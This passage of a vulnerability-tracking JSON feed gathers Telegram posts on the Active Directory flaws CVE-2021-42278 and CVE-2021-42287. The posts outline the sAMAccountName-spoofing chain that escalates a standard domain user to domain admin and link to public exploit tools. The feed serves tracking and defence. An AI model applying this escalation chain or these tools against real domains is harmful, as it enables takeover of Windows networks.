https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T10:47:50.000000Z"}, {"uuid": "5c434dd4-c375-4af0-a587-d2bf552fe5b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "Telegram/8kfY5IrVwgv6d-jVaXidvd01teGjJ-EZbZhebbrlHOlDEw", "content": "", "creation_timestamp": "2021-12-21T02:40:26.000000Z"}, {"uuid": "dbb2d478-cc04-4698-bbd7-319315596f2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/true_secator/2464", "content": "\u200b\u200b\u0412\u044b\u0448\u0435\u0434\u0448\u0438\u0439 \u0432 \u0441\u0432\u0435\u0442 PoC \u0434\u043b\u044f CVE-2021-42287 \u0438 CVE-2021-42278 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u0431\u043e\u043b\u044c\u0448\u0443\u044e \u043e\u0431\u0435\u0441\u043f\u043e\u043a\u043e\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u0443 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0438 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 Microsoft.\n \n\u0414\u0435\u043b\u043e \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u043d\u043e\u044f\u0431\u0440\u044c\u0441\u043a\u0438\u043c Patch Tuesday \u043e\u0448\u0438\u0431\u043a\u0438 Active Directory \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0438 \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u0434\u043e\u043c\u0435\u043d\u044b Windows.\n \nMicrosoft \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435\u0437\u0430\u043c\u0435\u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043e\u0431\u043e\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u043a\u0440\u0430\u0442\u0447\u0430\u0439\u0448\u0438\u0435 \u0441\u0440\u043e\u043a\u0438. IT-\u0433\u0438\u0433\u0430\u043d\u0442 \u0442\u0430\u043a\u0436\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043b \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0435 \u0440\u0443\u043a\u043e\u0432\u043e\u0434\u0441\u0442\u0432\u043e \u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435 \u043f\u043e \u044d\u0442\u0438 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u043c.\n \n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2021-42278 \u0441 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u043c\u0438 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0434\u0430\u0435\u0442 \u043e\u0431\u044b\u0447\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u043d\u0430 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 (\u0434\u043e 10 \u043c\u0430\u0448\u0438\u043d), \u0438 \u043a\u0430\u043a \u0435\u0433\u043e \u0432\u043b\u0430\u0434\u0435\u043b\u0435\u0446, \u043e\u043d \u0442\u0430\u043a\u0436\u0435 \u0438\u043c\u0435\u0435\u0442 \u043f\u0440\u0430\u0432\u0430 \u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0435\u0433\u043e \u0430\u0442\u0440\u0438\u0431\u0443\u0442 sAMAccountName.\n \n\u0412\u0442\u043e\u0440\u0430\u044f \u043e\u0448\u0438\u0431\u043a\u0430 CVE-2021-42287 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0445\u043e\u0434\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0430 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 Kerberos (PAC) \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u0434\u0430\u0432\u0430\u0442\u044c \u0441\u0435\u0431\u044f \u0437\u0430 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0442\u043e\u043c\u0443, \u0447\u0442\u043e \u0446\u0435\u043d\u0442\u0440 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043a\u043b\u044e\u0447\u0435\u0439 (KDC) \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u0431\u0438\u043b\u0435\u0442\u044b \u0441\u043b\u0443\u0436\u0431\u044b \u0441 \u0431\u043e\u043b\u0435\u0435 \u0432\u044b\u0441\u043e\u043a\u0438\u043c\u0438 \u0443\u0440\u043e\u0432\u043d\u044f\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439, \u0447\u0435\u043c \u0443 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u0434\u043e\u043c\u0435\u043d\u0430. \u042d\u0442\u043e \u0434\u043e\u0441\u0442\u0438\u0433\u0430\u0435\u0442\u0441\u044f \u0442\u0435\u043c, \u0447\u0442\u043e KDC \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0438\u0442\u044c, \u0434\u043b\u044f \u043a\u0430\u043a\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d \u0431\u0438\u043b\u0435\u0442 \u0441\u043b\u0443\u0436\u0431\u044b \u0441 \u0431\u043e\u043b\u0435\u0435 \u0432\u044b\u0441\u043e\u043a\u0438\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438.\n \n\u041e\u0431\u044a\u0435\u0434\u0438\u043d\u0438\u0432 \u043e\u0431\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043f\u0440\u044f\u043c\u043e\u0439 \u043f\u0443\u0442\u044c \u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430 \u0432 \u0441\u0440\u0435\u0434\u0435 Active Directory, \u0433\u0434\u0435 \u0431\u0430\u0433\u0438 \u043d\u0435 \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u044b. \u041f\u043e \u0438\u0442\u043e\u0433\u0443 \u0430\u0442\u0430\u043a\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043b\u0435\u0433\u043a\u043e \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0434\u043e \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430, \u043a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u043e\u043d\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0443\u044e\u0442 \u043e\u0431\u044b\u0447\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f.\n \n\u041a\u0430\u043a \u0432\u0441\u0435\u0433\u0434\u0430, \u043c\u044b \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0430 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430\u0445 \u0434\u043e\u043c\u0435\u043d\u0430 \u0438 \u043d\u0435 \u0438\u0441\u043f\u044b\u0442\u044b\u0432\u0430\u0442\u044c \u0441\u0443\u0434\u044c\u0431\u0443.", "creation_timestamp": "2021-12-22T14:09:17.000000Z"}, {"uuid": "26110dd0-bf2b-4e1e-b7a5-c9954f18a9d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/RalfHackerChannel/1145", "content": "CVE-2021-42287/CVE-2021-42278: impersonate DA from standard domain user\n\n\u0421\u043a\u0430\u043d\u0435\u0440 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043d\u0430 C#:\nhttps://github.com/cube0x0/noPac\n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043d\u0430 python \u0434\u043b\u044f \u043a\u0430\u043b\u0438:\nhttps://github.com/WazeHell/sam-the-admin \n\n#exploit #git #pentest #redteam", "creation_timestamp": "2022-01-31T01:28:15.000000Z"}, {"uuid": "20ca18fa-0031-4411-b98c-d96b918c7c5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1502", "content": "#CVE-2021\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user \n\nhttps://github.com/WazeHell/sam-the-admin\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T16:59:21.000000Z"}, {"uuid": "f01a302f-b66c-43c0-a90b-c41ca75eadeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/reconshell/1138", "content": "Windows AD privilege escalation\n\n#PrivilegeEscalation #CVE-2021-42278 #Scanning\n#Exploitation #Windows #Hacking #AD #RedTeam\n\nhttps://reconshell.com/windows-ad-privilege-escalation/", "creation_timestamp": "2021-12-19T19:48:01.000000Z"}, {"uuid": "0cc649bb-b87d-4ec8-bbf5-30c56a29cf59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/thehackernews/1747", "content": "Microsoft warns that two recently reported vulnerabilities \u2014 tracked as CVE-2021-42278 and CVE-2021-42287 \u2014 in Active Directory could be exploited by attackers to take over unpatched Windows domain controllers.\n\nDetails: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T08:04:04.000000Z"}, {"uuid": "98a138f8-cc75-4c77-9ff5-7bf2ee6d7e0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/haccking/11425", "content": "\u0421\u043f\u0443\u0444\u0438\u043d\u0433 sAMAccountName: \u043e\u0442 LowPriv \u0434\u043e \u0434\u043e\u043c\u0435\u043d \u0430\u0434\u043c\u0438\u043d\u0430 \u0437\u0430 \u0448\u0435\u0441\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434. CVE-2021-42278.\n\n#AD #pentest #\u0441\u0442\u0430\u0442\u044c\u044f@haccking\n\n\u041a\u0430\u043a \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b Active Directory \u043d\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u044e\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0441\u0438\u043c\u0432\u043e\u043b\u0430 $ \u0432 \u043a\u043e\u043d\u0446\u0435 \u0438\u043c\u0435\u043d\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u043e\u0433\u043e \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430, \u0445\u043e\u0442\u044f \u0432\u0441\u0435 \u043c\u0430\u0448\u0438\u043d\u043d\u044b\u0435 \u0438\u043c\u0435\u043d\u0430 \u043e\u043a\u0430\u043d\u0447\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0438\u043c\u0435\u043d\u043d\u043e \u0438\u043c. \u042d\u0442\u043e\u0442 \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u00ab\u043d\u0435 \u0431\u0430\u0433, \u0430 \u0444\u0438\u0447\u0430\u00bb \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0432\u043f\u043e\u043b\u043d\u0435 \u0441\u0435\u0431\u0435 \u0431\u043e\u043b\u044c\u0448\u0438\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f\u043c \u0432 \u0441\u0432\u044f\u0437\u043a\u0435 \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e CVE-2021-42287. \u0415\u0441\u043b\u0438 \u043c\u044b \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u0443\u0435\u043c \u043a\u0430\u043a\u043e\u0439-\u043d\u0438\u0431\u0443\u0434\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u0432 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430, \u0437\u0430\u043f\u0440\u043e\u0441\u0438\u043c \u0434\u043b\u044f \u043d\u0435\u0433\u043e TGT, \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u0443\u0435\u043c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u043e\u0431\u0440\u0430\u0442\u043d\u043e (\u043d\u0435\u0432\u0430\u0436\u043d\u043e, \u0432 \u043a\u0430\u043a\u043e\u0435 \u0438\u043c\u044f) \u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u044d\u0442\u043e\u0433\u043e TGT \u0437\u0430\u043f\u0440\u043e\u0441\u0438\u043c TGS \u043d\u0430 \u043a\u0430\u043a\u0443\u044e-\u043b\u0438\u0431\u043e \u0441\u043b\u0443\u0436\u0431\u0443 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, LDAP) \u044d\u0442\u043e\u0433\u043e, \u043d\u044b\u043d\u0435 \u0443\u0436\u0435 \u043d\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e, \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430? \u041d\u0435\u0443\u0436\u0435\u043b\u0438 \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0431\u0438\u043b\u0435\u0442, \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u043e\u043c \u0434\u043e\u043c\u0435\u043d\u0430, \u043d\u0430 \u0441\u0430\u043c\u043e\u0433\u043e \u0441\u0435\u0431\u044f? \u0414\u0430 \u043d\u0435, \u0431\u0440\u0435\u0434, \u0431\u044b\u0442\u044c \u0442\u0430\u043a\u043e\u0433\u043e \u043d\u0435 \u043c\u043e\u0436\u0435\u0442... \u0412\u0435\u0434\u044c \u0442\u0430\u043a?\n\n\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u0441\u0442\u0430\u0442\u044c\u044e.\n\nLH | \u041d\u043e\u0432\u043e\u0441\u0442\u0438 | OSINT | \u041a\u0443\u0440\u0441\u044b", "creation_timestamp": "2024-11-20T13:25:03.000000Z"}, {"uuid": "6bd3a04d-8be7-48a0-b7cd-535cf156bb97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/haccking/7058", "content": "#\u041e\u0431\u0443\u0447\u0435\u043d\u0438\u0435\n\u041e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0434\u043e\u043c\u0435\u043d\u0430 \u0434\u043e \u043f\u0440\u0430\u0432 \u0430\u0434\u043c\u0438\u043d\u0430: CVE-2021-42278, CVE-2021-42287", "creation_timestamp": "2022-01-22T10:49:05.000000Z"}, {"uuid": "f648ab15-2fbd-4437-a342-d12d1d53212f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1460", "content": "#Red_Team\n\nExploiting CVE-2021-42278/CVE-2021-42287 to impersonate DA from standard domain user\nhttps://github.com/WazeHell/sam-the-admin\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T04:30:01.000000Z"}, {"uuid": "e8f55dfd-8ba3-4fc8-8448-893f6c67b207", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1382", "content": "#CVE-2021\n\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user \n\nhttps://github.com/Ridter/noPac\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T14:51:41.000000Z"}, {"uuid": "9e7f7df4-76b4-4501-8067-ee741cd20c09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1328", "content": "#CVE-2021\nCVE-2021-42287/CVE-2021-42278 Scanner & Exploiter.\n\nhttps://github.com/cube0x0/noPac\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T20:46:13.000000Z"}, {"uuid": "f0f385a1-e277-451a-984d-cde2aab11851", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1394", "content": "#CVE-2021\nExploiting CVE-2021-42278 and CVE-2021-42287\n\nhttps://github.com/waterrr/noPac\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T20:05:03.000000Z"}, {"uuid": "ce13f008-3c2a-4779-a478-e7ee45da94be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/haccking/11436", "content": "\u26a1\ufe0f \u0422\u043e\u043f \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445/\u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0445 \u043f\u043e\u0441\u0442\u043e\u0432 \u0437\u0430 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0443\u044e \u043d\u0435\u0434\u0435\u043b\u044e (\u0441\u043e\u0445\u0440\u0430\u043d\u0438 \u0441\u0435\u0431\u0435 \u0447\u0442\u043e\u0431\u044b \u043d\u0435 \u043f\u043e\u0442\u0435\u0440\u044f\u0442\u044c):\n\n1. \u041f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0439 \u0442\u043e\u043f \u0441\u0442\u0430\u0442\u0435\u0439\n2. \u0420\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0439 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0431\u043e\u043b\u044c\u0448\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043e\u0431\u0443\u0447\u0430\u044e\u0449\u0435\u0433\u043e \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u0430 \u0434\u043b\u044f \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u043e\u0431\u043b\u0430\u0447\u043d\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b Azure\n3. \u0420\u0430\u0437\u0432\u0435\u0434\u043a\u0430 \u043f\u043e Telegram \u0431\u043e\u0442\u0430\u043c\n4. Power Remote Desktop \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0440\u0430\u0431\u043e\u0447\u0435\u043c\u0443 \u0441\u0442\u043e\u043b\u0443 \u043d\u0430 \u0447\u0438\u0441\u0442\u043e\u043c PowerShell!\n5. \u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u043d\u0435\u0437\u0430\u043c\u0435\u0442\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0434\u043b\u044f Windows\n6. \u041c\u043e\u0449\u043d\u044b\u0439 \u043f\u043e\u043b\u0443\u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 OSINT-\u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a \u0438 \u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440 \u043f\u0430\u043a\u0435\u0442\u043e\u0432\n7. \u0421\u043f\u0443\u0444\u0438\u043d\u0433 sAMAccountName: \u043e\u0442 LowPriv \u0434\u043e \u0434\u043e\u043c\u0435\u043d \u0430\u0434\u043c\u0438\u043d\u0430 \u0437\u0430 \u0448\u0435\u0441\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434. CVE-2021-42278\n8. \u0420\u0435\u0441\u0443\u0440\u0441 \u0441 \u043e\u0433\u0440\u043e\u043c\u043d\u043e\u0439 \u043a\u043e\u043b\u043b\u0435\u043a\u0446\u0438\u0435\u0439 \u0441\u043b\u043e\u0432\u0430\u0440\u0435\u0439 \u0434\u043b\u044f \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441\u0430\n9. \u041a\u0430\u043a \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043a\u0430\u043a PDF, \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Word \u0438\u043b\u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b \u0432\u0435\u0431-\u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430\n\n\u2604 \u0421\u0434\u0435\u043b\u0430\u043b\u0438 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0439 \u043a\u0430\u043d\u0430\u043b \u043f\u043e OSINT\n\n#\u043f\u043e\u0434\u0431\u043e\u0440\u043a\u0430 #\u043b\u0443\u0447\u0448\u0438\u0435\u0441\u0442\u0430\u0442\u044c\u0438 #\u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u0430\u044f\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c #\u0418\u0411 #\u0445\u0430\u043a\u0438\u043d\u0433\n\nLH | \u041d\u043e\u0432\u043e\u0441\u0442\u0438 | OSINT | \u041a\u0443\u0440\u0441\u044b", "creation_timestamp": "2024-11-24T15:23:13.000000Z"}, {"uuid": "1097777e-b96a-4abd-8e6e-46e11c22b7cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/5115", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (Dec 1-31)\nCVE-2021-44228 - Apache Log4j2\nCVE-2021-45046 - Apache Log4j DoS\nCVE-2021-42278, CVE-2021-42287 - AD Domain Services EoP Vulnerability\nCVE-2021-44832 - Apache Log4j 2.17.0\nCVE-2021-45105 - DoS via Uncontrolled Recursion in Log4j Strsubstitutor\nCVE-2021-43798 - Grafana 8.x Path Traversal\nCVE-2021-44077 - PreAuth RCE in ManageEngine ServiceDesk Plus\nCVE-2021-4422 - Log4j vulnerability\nCVE-2021-44515 - Zoho ManageEngine Desktop Central Pre-auth RCE", "creation_timestamp": "2024-10-21T16:08:53.000000Z"}, {"uuid": "ba0363a1-288a-4fee-adec-d840246b5404", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/4950", "content": "#Threat_Research\n1. The Python Vulnerability Landscape:\nAnalysis of 10yrs of vulnerability data\nhttps://medium.com/geekculture/the-python-vulnerability-landscape-3904494eec67\n2. CVE-2021-42287/CVE-2021-42278:\nWeaponisation - Active Directory\nhttps://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n]-> https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing", 